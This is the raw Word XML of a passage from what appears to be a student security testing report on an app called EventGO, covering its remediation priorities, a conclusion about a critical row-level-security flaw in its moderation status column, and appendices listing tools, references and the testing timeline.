          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix soon (within a week or two)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-06 — Replace the weak email validation with a proper regex.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-07 — Add a reply count limit (e.g. max 500 replies per conversation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-09 — Add CHECK constraints on text column lengths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-10 — Create an audit log table for admin actions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-11 — Add the other missing HTTP headers (X-Frame-Options, nosniff, Referrer-Policy).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix when you have time</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-08 — Merge phase3_1 and phase3_2 into one migration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-12 — Set up a GitHub Actions CI pipeline with npm audit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-15, F-16, F-17 — Small code quality fixes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-18 — Delete the deprecated folder.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="340" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2563EB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="20" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Overall I think the developer put genuine effort into securing the database layer. The use of RLS policies, SECURITY DEFINER functions with proper auth checks, column-level grants, and advisory locking shows a good understanding of Supabase security concepts. The project is clearly more security-conscious than most beginner projects I have seen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">That said, the critical bug I found (F-01) is a really serious one. It is the kind of thing that is easy to miss because the policy technically "works" from an ownership perspective — it just forgets to protect the status column specifically. Fixing it is a one-liner but the impact if left unfixed is that the whole moderation system means nothing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The other major issues (F-02 through F-05) are also important and should be fixed before the app goes live. The rest are medium or low priority and are the kind of things you would normally clean up in a second pass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">I tested this entirely through static code analysis over 3 days. I did not have access to a live instance. Some findings (especially around the deprecated code and the CI pipeline) would need to be verified against the actual deployed environment.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bCs/>
                <w:color w:val="1f2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tahbir Moon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">30 March 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1f2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Security Testing — University Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="340" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e3a5f"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix — Tools &amp; References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2563EB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="20" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">VS Code — code review and manual SQL analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub — repository access and file browsing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Supabase documentation — understanding RLS policy behavior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Testing Guide v4.2 — testing methodology reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE database (cwe.mitre.org) — classifying vulnerability types</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10 2021: https://owasp.org/Top10/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Supabase RLS docs: https://supabase.com/docs/guides/database/postgres/row-level-security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Supabase Hardening API: https://supabase.com/docs/guides/api/hardening-data-api</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-285 Improper Authorization: https://cwe.mitre.org/data/definitions/285.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1f2937"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL SECURITY DEFINER: https://www.postgresql.org/docs/current/sql-createfunction.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing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Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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Activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1e3a5f"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Files Covered</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28 Mar 2026</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Initial reconnaissance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README, package.json, index.html, .gitignore</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29 Mar 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>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Database layer analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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phase1 through phase4 SQL files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30 Mar 2026</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Deep dive + write-up</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pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1f2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">phase5 through phase6_4, full report</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before="120"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="6B7280"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">University Project — Confidential</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026"/>
      </w:tabs>
      <w:spacing w:before="0" w:after="120"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="6B7280"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">EventGO — Security Testing Report</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="6B7280"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">	Tahbir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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1e3a5f"/>
      <w:sz w:val="34"/>
      <w:szCs w:val="34"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="220" w:after="100"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2563EB"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="160" w:after="80"/>
      <w:outlineLvl w:val="2"/>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2026-03-30T15:46:22.883Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-30T15:46:22.884Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>